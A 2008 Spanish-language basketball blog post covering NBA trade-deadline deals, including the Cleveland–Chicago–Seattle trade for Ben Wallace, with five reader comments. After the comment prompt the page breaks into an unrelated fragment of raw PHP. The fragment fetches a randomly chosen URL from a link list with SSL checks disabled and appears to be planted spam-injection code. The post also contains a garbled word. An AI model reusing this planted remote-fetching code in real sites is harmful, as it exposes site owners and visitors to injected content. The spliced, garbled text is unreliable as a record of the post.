Se cerró el telón

22 de February de 2008 por txusma

Las últimas horas antes de la finalización del período de traspasos son siempre emocionantes. Aun conociendo todos los rumores que giran alrededor de la liga nunca dejas de sorprenderte por éste o aquel traspaso. Esta noche no ha sido una excepción y se han cerrado hasta 5 traspasos:

  • El más importante es el que ha involucrado a 3 equipos, Cleveland, Chicago y Seattle, y que ha enviado a Ben Wallace a los Cavs. Siendo exactos, Chicago ha recibido a Larry Hughes, Drew Gooden, Shannon Brown y Cedric Simmons; Cleveland, a Ben Wallace, Joe Smith, Wally Szcerbiack, Delonte West y la primera ronda de Chicago de 2009; y Seattle, a Donyell Marshall, Ira Newble y Adrian Griffin. Con este traspaso Cleveland pone toda la carne en el asador para conseguir el anillo, ya que se ha hecho de una tacada con 4 jugadores válidos para ser incluso titulares, por lo que mejora sustancialmente el banquillo que tenía. Posiblemente Delonte, Wallybenvspistonssheed y Ben serán titulares a partir de ahora. Por parte de Chicago, este traspaso puede significar el adiós a final de temporada de Ben Gordon a causa de sus grandes exigencias económicas. Con Hughes se aseguran un recambio aunque no precisamente barato. El traspaso de Wallace y Joe Smith deja la la vía libre para Drew Gooden y dará minutos a los Gray, Noah y Thomas.
  • En otro traspaso a 3 bandas, aunque mucho menos importante, New Orleans se ha hecho con Bonzi Wells y Mike James; Houston, con Bobby Jackson (otro 1-2), Adam Haluska, una segunda ronda del 2008 y los derechos de Sergei Lishouk; y, finalmente, Memphis ha conseguido a Marcus Vinicius y los derechos de Malick Badiane. Claramente la aportación de Memphis en este traspaso es totalmente anecdótica pero ha ayudado a cerrar el trade entre Hornets y Rockets.
  • Detroit y Toronto han intercambiado a Juan Dixon y Primoz Brezec.
  • Houston se ha hecho también con los servicios de Gerald “4 Dedos” Green a cambio de Kirk Snyder, una segunda ronda del 2010 y cash.
  • Por último y por aquello de que nadie diga que Denver no se ha movido, los Nuggets se han hecho con Taurean Green, de Portland, a cambio de Von Wafer.

¿Y qué hay de Ron Artest, Mike Miller, Vince Carter, Zach Randolph y Andre Miller? Pues que continuarán en sus equipos al menos hasta final de temporada.

Comenta

5 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Desde el punto de vista de los Bulls es complicado. Deshacerse de Wallace es una buena decisión. Y traer a Hughes puede no salirles tan mal como parece: Hughes en los Cavs no tenía sitio. En los Bulls encajará mejor. Su rendimiento y la evolución de Noah y Tyrus es la clave. Además, claro, de lo que obtengan a cambio de Gordon, que tiene toda la pinta de sign & trade.

    Para los Cavs es un buen movimiento a corto plazo. Wally, Joe, Delonte y Ben son una clara mejora, y aportan cosas de las que carecían hasta ahora. Si les sale bien, serán durísimos de ganar.

    Y Seattle se está moviendo bien de cara al futuro. Paciencia es lo único que necesitan ahora.

      Citar

  2. RusticoColorao dice:
    #2

    ¿Y por qué coño damos la primera ronda de 2009? Este Paxson es imbécil…y eso que trae a Hughes, uno de mis jugadores favoritos…aunque no sé si es jugador o ex-jugador. Bueno no sé…no entiendo nada este trade sinceramente.

      Citar

  3. MagicJohnson32 dice:
    #3

    Paxson da la 1ª ronda de 2009 porque está convencido de que el año que viene seréis finalistas y por tanto la ronda valdrá poco.

    PD: Jojojo.

      Citar

  4. xapa_croack dice:
    #4

    Quien es Sergei Lishouk??

      Citar

  5. Dantley dice:
    #5

    Pues los jugadores de Chicago parece que han renacido. Con un equipo jovencísimo, esta noche se han salido y eso que los nuevos todavía no estaban y quizá ni falta que hacen. Este traspaso huele al típico adición por substracción. Ben Wallace olía a podrido y se lo han quitado de encima.

    Lishouk es un 4 ucraniano de estos que se draftean en 2ª ronda a ver que pasa, pero sigue en Ucrania y no parece que destaque especialmente, así que no deja de ser relleno.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>